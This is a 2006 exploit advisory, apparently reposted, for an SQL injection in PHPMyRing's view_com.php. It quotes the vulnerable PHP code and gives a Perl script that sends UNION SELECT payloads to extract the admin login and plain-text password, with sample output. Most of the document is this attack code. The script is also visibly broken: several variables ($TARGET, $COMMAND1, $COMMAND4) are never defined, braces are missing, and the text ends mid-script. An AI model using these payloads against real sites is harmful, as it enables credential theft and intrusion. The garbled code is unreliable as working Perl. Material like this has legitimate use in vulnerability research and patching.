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PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit
来源:http://www.morx.org 作者:Simo 发布时间:2006-08-10  

# Title: PHPMyRing's (view_com.php) Remote SQL injection Exploit
# Vendor: phpmyring
# webiste : http://phpmyring.sourceforge.net/
# Version : <= 4.2.0
# Severity: Critical
# Discovered by: Simo64 <simo64_at_morx_org>
# Exploit writting by: Simo Ben youssef <simo_at_morx_org>
# Discovered: 09 Aout 2006
# Published : 10 Aout 2006
# MorX Security Research Team
# http://www.morx.org
# Details:
# vulnerable code on view_com.php line ( 14 - 24)
# [code]
# -----------------------------------------------------------------------------------
# if (!$idsite)
# {
# echo "<p align=\"center\">"._("Erreur! Le n° du site n'est pas défini!")."</p>";
# }
# else
# {
# // On va aller chercher le nom du site consern., .a sera fait ;)
# // Connexion MySQL
# $conn=connecte();
# $row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite")); # <== SQL injection
# $site_nom=$row['site_nom'];
# ...............
# <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
# <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<? echo _("fr"); ?>">
# <head>
# <title><? echo _("Commentaires du site"). " ".$site_nom; ?></title>
# ---------------------------------------------------------------------------------[/code]
# $idsite is not properly sanitized and can be used to inject sql query
# Exploit to extract both admin login and plain text password:
# C:\>perl ring.pl webring
# #################################################
# # PHPMyRing's Remote SQL injection Exploit #
# # Discovered by simo64_at_morx_org #
# # Script writting by simo_at_morx_org #
# # MorX Security Research Team #
# # www.morx.org #
# #################################################

# [*] Trying to get the admin login ...

# [+] your admin login is --> admin

# [+] your admin pass is --> 123456

use IO::Socket;

if(!defined($ARGV[0] && $ARGV[1])) {

system (clear);
print "\n";
print "#################################################\n";
print "# PHPMyRing's Remote SQL injection Exploit #\n";
print "# Discovered by simo64_at_morx_org #\n";
print "# Script writting by simo_at_morx_org #\n";
print "# MorX Security Research Team #\n";
print "# www.morx.org #\n";
print "#################################################\n\n";

print "--- Usage: perl $0 <host> <folder>\n";
print "--- Example: perl $0 afd_webring\n\n";
exit; }



$PORT = "80";

$SCRIPT = "/view_com.php?idsite=";

$SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";

$SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";


$COMMAND2 = "Host: $TARGET";
$COMMAND3 = "Connection: Close";

$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";

print "#################################################\n";
print "# PHPMyRing's Remote SQL injection Exploit #\n";
print "# Discovered by simo64_at_morx_org #\n";
print "# Script writting by simo_at_morx_org #\n";
print "# MorX Security Research Team #\n";
print "# www.morx.org #\n";
print "#################################################\n\n";

sleep 2;

print "[*] Trying to get the admin login ...\n\n";

print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";

while ($result = <$remote> ) {

if ($result =~ /site (.*?)</ ) {
$adminlogin = $1;
print "[+] your admin login is --> $adminlogin\n\n";
$a = 1;

if ($a == 0)
print "[-] Failed, cant get the admin login\n\n";
print "[*] Trying to get the admin password ...\n\n";

$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";

print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n";

while ($result2 = <$remote> ) {

if ($result2 =~ /site (.*?)</ ) {
$adminpass = $1;
print "[+] your admin pass is --> $adminpass\n\n";
$b = 1;

if ($b == 0)
{ print "[-] Failed, cant get the admin password\n";


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